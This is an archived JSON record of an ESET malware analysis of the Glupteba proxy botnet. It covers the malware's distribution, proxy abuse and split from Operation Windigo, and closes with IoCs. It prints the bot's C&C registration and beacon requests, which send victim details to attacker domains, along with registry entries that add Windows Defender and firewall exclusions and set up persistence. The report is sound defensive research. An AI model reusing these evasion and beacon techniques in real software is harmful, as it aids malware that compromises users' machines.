{
	"id": "9d017ba0-5534-4b65-97c5-fc20e27f2788",
	"created_at": "2026-04-06T00:17:23.39916Z",
	"updated_at": "2026-04-10T13:11:42.46731Z",
	"deleted_at": null,
	"sha1_hash": "b00bf0e53b018a12287820b6f2f255929c8ae5f9",
	"title": "Glupteba is no longer part of Windigo",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 317680,
	"plain_text": "Glupteba is no longer part of Windigo\r\nBy Frédéric Vachon\r\nArchived: 2026-04-05 22:24:35 UTC\r\nOur recent research on Linux/Ebury, the core component of Operation Windigo, led us to look at other components in\r\nWindigo’s ecosystem to see if they are still active and part of the same operation. During this process, we took a look at\r\nWin32/Glupteba, an open proxy previously distributed by exploit kits deployed as part of Operation Windigo. The result of\r\nour latest analysis strongly suggests that Glupteba is no longer tied to Operation Windigo.\r\nIn this blog post, we share the results of our investigation. We provide information about the current distribution\r\nmechanisms of Glupteba, a short analysis of the network traffic going through the proxy, and we discuss the relationship\r\nbetween Glupteba and Windigo. Finally, we give a technical analysis of the current state of the Glupteba binary.\r\nGlupteba distribution over time\r\nBrief history\r\nOver time, Glupteba is known to have used various distribution methods. ESET researchers have tracked the distribution of\r\nGlupteba for the last seven years. We’ll give a brief overview of its evolution.\r\nBack in 2011, ESET researchers working on the infamous TDL-4 bootkit discovered that, as explained in this blogpost, it\r\nwas being used as a downloader to fetch additional malware. Glupteba was found to be one of many malware variants it\r\ninstalled. TDL-4 operators were most likely selling a distribution service on black markets.\r\nThree years later, ESET’s investigation into Operation Windigo revealed that part of the attackers' infrastructure of\r\ncompromised Linux servers was used to redirect a certain proportion of HTTP requests through trojanized instances of web\r\nservers (Apache httpd, lighttpd and nginx). Redirected requests would hit DNS servers under the control of Windigo’s\r\noperators, which resolved the A record to the IP address of the final redirection targets. 
These usually hosted exploit kits.\r\nUpon successful exploitation, Glupteba would be installed.\r\nThe ties between Windigo and Glupteba didn’t end there. Glupteba’s C\u0026C servers were also hosted on machines that were\r\npart of Windigo’s botnet. Furthermore, the sole purpose of Glupteba at the time was to relay spam jobs fetched from\r\nWindigo’s infrastructure. It is, however, hard to say if Glupteba was operated by the same individuals as the Windigo botnet\r\nor if it was some kind of service provided by Windigo’s operators reselling usage of their infrastructure.\r\nCurrent distribution scheme\r\nOnce again, Glupteba’s distribution vector changed. It is not distributed via Windigo’s infrastructure anymore. Glupteba is\r\nnow part of its own botnet and is distributed by MSIL/Adware.CsdiMonetize.AG, which is used to install many different\r\nmalware families – suggesting a Pay-Per-Install scheme. In addition to installing Glupteba, we’ve seen it deploying Adware,\r\nBitcoin mining agents and various PUAs (Potentially Unwanted Applications). MSIL/Adware.CsdiMonetize.AG doesn’t\r\ndirectly install Glupteba.AY; instead it downloads its dropper, which is responsible for registering the bot to its C\u0026C, adding\r\nexclusions to Windows Defender and the Windows firewall as well as setting the environment to install Glupteba.\r\nThe query to register the bot contains multiple pieces of information about the victim’s machine. 
Here’s an example of such\r\na query:\r\nhttps://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/\r\nPage 1 of 11\n\nPOST /bots/register HTTP/1.1\r\nHost: burnandfire5.com\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 400\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\nData[appname]=SolitaryBrook\u0026Data[arch]=32\u0026Data[av]=\u0026Data[build_number]=7601\u0026Data[compaign_id]=\u0026Data[cpu]=\u003cCPU_SPEC\u003e\u0026Data[defender]=1\u0026Data[exploited]=1\u0026Data[firewall]=1\u0026Data[gpu]=\u003cGPU_INFO\u003e\u0026Data[is_admin]=1\u0026Data[os]=\u003cOS_INFO\u003e\u0026Data[username]=\u003cUSERNAME\u003e\u0026Data[version]=71\r\nThe Windows Registry value HKCU\\Software\\Microsoft\\TestApp\\UUID is also created. It is needed by Glupteba to execute\r\nsuccessfully. This value’s data must not be empty.\r\nFinally, the following registry entries are created to add exclusion rules to Windows Defender and the Windows Firewall:\r\nHKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Roaming\\EpicNet Inc\\CloudNet = 0\r\nHKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\\cloudnet.exe = 0\r\nHKLM\\SYSTEM\\ControlSet001\\services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{09E3DB75-DE77-4B2D-A351-C745D9A15617} = \"v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Roaming\\EpicNet Inc\\CloudNet\\cloudnet.exe\"\r\nAccording to ESET’s telemetry, Glupteba has been seen in 180 different countries since the beginning of 2017. Three\r\ncountries jointly account for 25% of all detections – Ukraine, the Russian Federation and Turkey. Figure 1 shows the\r\ndistribution per country of the detections we observed.\r\nFigure 1.
Distribution of detections per country\r\nProxy usage analysis\r\nDuring ESET's research into Operation Windigo, Glupteba's sole purpose was to relay spam jobs to their final recipients. We\r\nwanted to see if the use of Glupteba has changed since then. During November 2017, we captured network traffic going\r\nthrough an infected node for a duration of four days. Note that we didn’t decrypt the HTTPS traffic, so our visibility was\r\nlimited to non-encrypted network protocols. Our analysis showed that Glupteba is no longer limited to sending spam. It is\r\nnow primarily used by various automated systems. While Glupteba’s operators might use the proxy, we do believe that the\r\nuse of Glupteba is sold to third-party users as a proxy service. Here, we provide information about the most interesting\r\ntraffic we observed.\r\nThe first thing we noticed is that Glupteba is still used to relay spam messages to their final recipients. Here’s an example of\r\na spam message:\r\nFrom: \"Ella Dmhfey\" \u003cElla87@bilanzgewinn.at\u003e\r\nTo: \"???????\" \u003c??????????@gmail.com\u003e\r\nSubject: ?????????? kaufen Sie Se-xpower\r\nDate: Fri, 10 Nov 2017 14:18:10 +0100\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;   \r\ncharset=\"iso-8859-1\"\r\nContent-Transfer-Encoding: 7bit\r\nGuten Tag ????????? , \r\nDamit kriegen Sie Ihre Dame zum Hoehepunkt. \r\n?????????: http://www.sexpillen-versandhaus[.]info/shop\r\nWe’ve also seen Glupteba used to attempt password-reuse attacks. Glupteba provides some level of anonymity to the\r\nattackers since the IP address of the proxy user is never exposed to the actual targeted server. Moreover, it allows spreading\r\nthe queries across multiple IP addresses, thus reducing the risk of being banned by the website targeted by the password-reuse attack. We’ve seen such attacks performed on three domains:\r\nTable 1.
Domains targeted that don’t use HTTPS\r\nDomain name Short description\r\nadfoc.us URL shortener service where users are paid per visit\r\nbonusbitcoin.co Free bitcoin faucet website\r\nsocial.tunecore.com Music distribution website\r\nThere are probably more targeted domains. Based on the server_name extension field of the ClientHello structure used\r\nduring the TLS handshake, we know the domain names that were accessed even when HTTPS was used. This gives insight\r\ninto what websites may have been targeted. Table 2 gives a list of such domain names along with the associated authentication\r\nURLs. They are sorted with the most frequently visited on the top.\r\nTable 2. Domains in server_name certificate field\r\nServer name Authentication URL\r\nauth.mail.ru https://auth.mail.ru/cgi-bin/auth\r\nwww.instagram.com https://www.instagram.com/accounts/login/ajax/\r\nstore.steampowered.com https://store.steampowered.com/login/dologin/\r\nwww.amazon.com https://www.amazon.com/ap/signin\r\nauth.riotgames.com https://auth.riotgames.com/authz/auth\r\nvk.com https://vk.com/login\r\nglobal.americanexpress.com https://global.americanexpress.com/myca/logon/emea/action\r\nwww.facebook.com https://www.facebook.com/login/device-based/regular/login/\r\nsignin.ea.com https://signin.ea.com/p/web2/login\r\naccount.t-mobile.com https://account.t-mobile.com/svr/authenticate\r\nwww.linkedin.com https://www.linkedin.com/uas/login-submit\r\nwww.westernunion.com https://www.westernunion.com/wuconnect/rest/api/v1.0/CustomerSignOn\r\nwww.paypal.com https://www.paypal.com/signin\r\nwww.britishairways.com https://www.britishairways.com/api/grant\r\nauth.api.sonyentertainmentnetwork.com https://auth.api.sonyentertainmentnetwork.com/login.jsp\r\naccount.sonymobile.com https://account.sonymobile.com/api/ng/signin\r\nwww.expedia.com https://www.expedia.com/user/signin\r\nAnother example
of a user proxying automated system traffic through Glupteba targeted www.omegle.com. Omegle is a\r\nwebsite where two strangers can meet in a private chat room. What we observed is a bot joining a chat room and trying to\r\ntrick the other user into clicking a link. It seems that this service is a popular target for bots. Most of the interactions we\r\ncaptured were between two bots trying to lure each other into either joining Kik Messenger, an instant messaging mobile\r\napp, or clicking shortened URLs that redirect to adult websites.\r\nExample of two bots interacting with each other:\r\nguest\u003e heyy\r\nstranger\u003e my name is Tomasa\r\nstranger\u003e im female   .\r\nstranger\u003e from Rio de aneiro,Brazil\r\nstranger\u003e ready to talk, enter here:\r\nstranger\u003e bit.ly/\u003cREDACTED\u003e\r\nguest\u003e 18 female\r\nguest\u003e wanena etrade picturesh ?\r\nguest\u003e zyari.site/\u003cREDACTED\u003e\r\nguest\u003e messsage me theree ill sendc you sxome mor8e\r\nguest\u003e ok we2ll im goinn 2 getwt off bye\r\nWe’ve also come across bots trying specially crafted HTTP POST requests in an attempt to find webshells. Domains were\r\ntried one after the other in ascending alphabetical order, which suggests they are programmatically processing a list of\r\ndomains.\r\nDiscussing links with Windigo\r\nWhen we decided to revisit Glupteba, it was primarily because we wanted to see if it was still associated with Operation\r\nWindigo; our analysis leads us to believe that the two are no longer affiliated. Let us provide the reasons for such\r\nconclusions.\r\nThe first thing we looked at is the C\u0026C servers used by Glupteba. Enumerating the IP addresses we found, none of them\r\nmatched any previously known Ebury-compromised servers.
Moreover, the new C\u0026C servers have a lot of ports open, while\r\nthe previous ones had only one DNAT and one SNAT rule to reroute the traffic to the actual C\u0026C server. Having so many\r\nports open on a compromised server would be very noisy, which is not the modus operandi of Windigo’s operators.\r\nAs documented in the Operation Windigo whitepaper, the client connecting to Glupteba used to send an HTTP GET request\r\non port 25 to a machine compromised by Ebury before starting to send spam jobs. This is no longer the case: spam jobs go\r\ndirectly through the proxy without any kind of prologue. Also, the spam messages themselves don’t look like those we used\r\nto see during Operation Windigo, where the messages led to a dating website. While it could be argued that the current spam\r\nmessages, trying to sell sexual enhancement pills to \"get your lady to the climax\", are a logical sequel to the previous one,\r\nwe believe they are unrelated.\r\nFinally, the distribution itself is not related to Windigo anymore. As mentioned previously, it is now distributed by\r\nMSIL/Adware.CsdiMonetize.AG.\r\nFor all these reasons, we believe that Glupteba is no longer linked with Operation Windigo.\r\nTechnical analysis\r\nIn this section, we provide a technical analysis of the samples of Glupteba we looked at during this research. The first thing\r\nwe noticed is that the current samples don’t look like those we analyzed back in 2014. We believe Glupteba has been\r\nrewritten from scratch. Whereas Glupteba used to be a fairly small and simple program, nowadays it has become a huge and\r\nvery complex C++ program. It used to have around 70 functions. Now, it has more than 3600 functions.\r\nFigure 2. Functions list comparison\r\nGlupteba now statically links to the Boost C++ libraries as shown in Figure 3.
To communicate over sockets, it uses the\r\nWindows Sockets APIs WSASend and WSARecv instead of send and recv.\r\nFigure 3. Boost C++ library related strings\r\nPersistence\r\nGlupteba acquires persistence by adding an entry in the Run registry key. Thus, every time Windows boots up, Glupteba will\r\nbe launched. Here’s the entry that is created:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\CloudNet = \"%APPDATA%\\EpicNet Inc\\CloudNet\\cloudnet.exe\"\r\nOther entries are also created in the Windows Registry. The most interesting are the following:\r\nHKCU\\Software\\EpicNet Inc.\\CloudNet\\Value = \"20180223\"\r\nHKCU\\Software\\EpicNet Inc.\\CloudNet\\GUID = \"CDC0432A-0298-40B1-9A71-D61F94C013A7\"\r\nThe GUID entry is set to the bot id that is created via a call to CoCreateGuid. As for the Value entry, it contains the PE\r\ntimestamp of Glupteba’s binary.\r\nC\u0026C communication\r\nFrom a networking perspective, there are no significant changes between the samples we documented in our Operation\r\nWindigo paper and the current version. When launched, Glupteba sends the same beacon to its C\u0026C and the response\r\ncontains the session and the port that Glupteba will connect to for retrieval of the proxying jobs. Refer to the earlier\r\nwhitepaper for more information about the protocol.\r\nBeacon sent to the C\u0026C:\r\nGET /stat?uptime=100\u0026downlink=1111\u0026uplink=1111\u0026id=05AA812F\u0026statpass=bpass\u0026version=20171106\u0026features=30\u0026guid=68794E51-0DBC-4CF6-BD98-8B18FE3E0A18\u0026comment=20171106\u0026p=0\u0026s= HTTP/1.0\r\nThe C\u0026C servers are stored encrypted in the binary. Once decrypted, they look like this:\r\n'server-%s.sportpics[.]xyz:30,server-%s.kinosport[.]top:30,'\r\nThe number after the colon is the maximum range of the server numbers.
In this case, '30' means that there are 30 domain\r\nnames generated by formatting the domain string with numbers from 1 to 30. When contacting the C\u0026C server, one of those\r\ndomains is randomly selected and the GUID of the compromised machine is prepended as a subdomain to the chosen server\r\nresulting in a domain like this:\r\nExample of a C\u0026C server:\r\n68794E51-0DBC-4CF6-BD98-8B18FE3E0A18.server-1.sportpics[.]xyz\r\nGlupteba also sends a second GET request to its C\u0026C server in order to update information about the victim’s machine\r\nspecifications. Here’s what the request looks like:\r\nGET /update.php?uid=\u003cBOT_ID\u003e\u0026version=\u003cVERSION\u003e\u0026OS=\u003cOS\u003e\u0026have_admin=1\u0026mys=\u003cC\u0026C_SERVERS\u003e\u0026build=\u003cPE_TIMESTAMP\u003e\u0026cpu=\u003cCPU\u003e\u0026video=\u003cVIDEO_CARD\u003e\u0026ram=\u003cGB_OF_RAM\u003e HTTP/1.0\r\nString encryption\r\nGlupteba’s strings are encrypted using a custom algorithm. The decryption process uses a 16-byte key and has three separate\r\nphases. The key is different for each build. During the first phase, the Mersenne Twister pseudorandom number generator\r\n(PRNG) is used. The algorithm is seeded with the first four bytes of the key. Then, each byte of the cipher is XORed with\r\nthe next byte generated by the PRNG.\r\nFigure 4. Phase One of the decryption process\r\nThere are three different variants of the second phase. One uses the Rabbit cipher; another uses a second round of XOR\r\noperations similar to the one from the first phase, but with a different seed derived from the key. The only variant that is\r\nused in the samples we analyzed is the third one.
It consists of an XOR loop with the key.\r\nThe third and final phase is another XOR loop with a value that is computed from the output of the second phase and some\r\nimmediate values.\r\nFigure 5. Phase Three of the decryption process\r\nIn our GitHub repository, we provide a script to decrypt all the strings. Since the Mersenne Twister PRNG implementation\r\nof Python varies a bit from the one used by Glupteba, we also provide a Python implementation of the PRNG. Make sure the\r\ndirectory where it is located is in your %PYTHONPATH% before launching the string decryption script. You can do so by\r\nrunning this command in IDA’s Python interpreter:\r\nsys.path.append(\u003cPATH_TO_SCRIPT\u003e)\r\nConclusion\r\nThe Glupteba operators persist in finding ways to distribute their malware despite the relentless efforts of the information\r\nsecurity community to disrupt their operations. After the exposure of Operation Windigo, they just moved to other tactics to\r\nget their malware spread to computers all around the globe.\r\nThe complete rewriting of their tools and the current distribution scheme show that the individuals behind Glupteba are still very\r\nactive.
Such efforts suggest that the open proxy market must be a very lucrative one, and that we’re unlikely to witness the\r\ndisappearance of Glupteba in the near future.\r\nIoCs\r\nFile hashes\r\nSHA-1 Filename Detection name\r\nB623F4A6CD5947CA0016D3E33A07EB72E8C176BA cloudnet.exe Win32/Glupteba.AY\r\nED310E5B9F582B4C6389F7AB9EED17D89497F277 cloudnet.exe Win32/Glupteba.AY\r\nF7230B2CAB4E4910BCA473B39EE8FD4DF394CE0D setup.exe MSIL/Adware.CsdiMonetize.AG\r\n70F2763772FD1A1A54ED9EA88A2BCFDB184BCB91 cloudnet.exe Win32/Glupteba.AY\r\n87AD7E248DADC2FBE00D8441E58E64591D9E3CBE cloudnet.exe Win32/Glupteba.AY\r\n1645AD8468A2FB54763C0EBEB766DFD8C643F3DB csrss.exe Win32/Agent.SVE\r\nGlupteba C\u0026C server domains\r\nserver-{1,30}[.]ostdownload.xyz\r\nserver-{1,30}[.]travelsreview.world\r\nserver-{1,30}[.]bigdesign.website\r\nserver-{1,30}[.]sportpics.xyz\r\nserver-{1,30}[.]kinosport.top\r\nserver-{1,30}[.]0ev.ru\r\nserver-{1,30}[.]0df.ru\r\nserver-{1,30}[.]0d2.ru\r\nserver-{1,30}[.]0d9.ru\r\nGlupteba C\u0026C server IP addresses\r\nAgent.SVE
C\u0026C server domains\r\nfinancialtimesguru[.]com\r\ncomburnandfire5[.]com\r\nSource: https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/"
	],
	"report_names": [
		"glupteba-no-longer-windigo"
	],
	"threat_actors": [
		{
			"id": "1934b371-2525-4615-a90a-772182bc4184",
			"created_at": "2022-10-25T15:50:23.396576Z",
			"updated_at": "2026-04-10T02:00:05.341979Z",
			"deleted_at": null,
			"main_name": "Windigo",
			"aliases": [
				"Windigo"
			],
			"source_name": "MITRE:Windigo",
			"tools": [
				"Ebury"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "3844202f-b24a-4e16-b7b9-dfe8c0a44d5d",
			"created_at": "2022-10-25T16:07:24.526179Z",
			"updated_at": "2026-04-10T02:00:05.023222Z",
			"deleted_at": null,
			"main_name": "Operation Windigo",
			"aliases": [
				"G0124"
			],
			"source_name": "ETDA:Operation Windigo",
			"tools": [
				"CDorked",
				"CDorked.A",
				"Calfbot",
				"Ebury"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434643,
	"ts_updated_at": 1775826702,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b00bf0e53b018a12287820b6f2f255929c8ae5f9.pdf",
		"text": "https://archive.orkl.eu/b00bf0e53b018a12287820b6f2f255929c8ae5f9.txt",
		"img": "https://archive.orkl.eu/b00bf0e53b018a12287820b6f2f255929c8ae5f9.jpg"
	}
}